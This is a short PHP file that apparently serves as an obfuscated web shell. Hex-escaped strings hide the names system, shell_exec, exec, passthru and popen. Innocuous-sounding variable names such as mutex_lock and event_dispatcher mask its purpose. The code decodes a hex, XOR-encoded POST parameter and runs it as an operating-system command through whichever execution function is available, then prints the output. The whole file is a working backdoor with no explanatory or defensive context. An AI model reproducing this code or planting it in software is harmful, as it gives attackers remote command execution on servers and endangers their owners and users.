<?php

$restore_state5 = "po\x70e\x6E";
$restore_state4 = "\x70a\x73s\x74\x68ru";
$restore_state6 = "strea\x6D\x5Fget\x5Fco\x6Et\x65nt\x73";
$restore_state1 = "\x73yste\x6D";
$restore_state7 = "pcl\x6F\x73\x65";
$restore_state3 = "e\x78\x65c";
$restore_state2 = "sh\x65\x6Cl\x5Fe\x78\x65c";
$event_dispatcher = "h\x65x2bin";
if (isset($_POST["\x65\x6Et"])) {
            function mutex_lock      (      $parameter_group   ,      $ent    )     {
   $factor   =   ''     ;
    foreach(str_split($parameter_group) as $char){
$factor.=chr(ord($char)^$ent);

} return     $factor;
    
}
            $ent = $event_dispatcher($_POST["\x65\x6Et"]);
            $ent = mutex_lock($ent, 81);
            if (function_exists($restore_state1)) {
                $restore_state1($ent);
            } elseif (function_exists($restore_state2)) {
                print $restore_state2($ent);
            } elseif (function_exists($restore_state3)) {
                $restore_state3($ent, $comp_parameter_group);
                print join("\n", $comp_parameter_group);
            } elseif (function_exists($restore_state4)) {
                $restore_state4($ent);
            } elseif (function_exists($restore_state5) && function_exists($restore_state6) && function_exists($restore_state7)) {
                $ent_factor = $restore_state5($ent, 'r');
                if ($ent_factor) {
                    $res_dchunk = $restore_state6($ent_factor);
                    $restore_state7($ent_factor);
                    print $res_dchunk;
                }
            }
            exit;
        }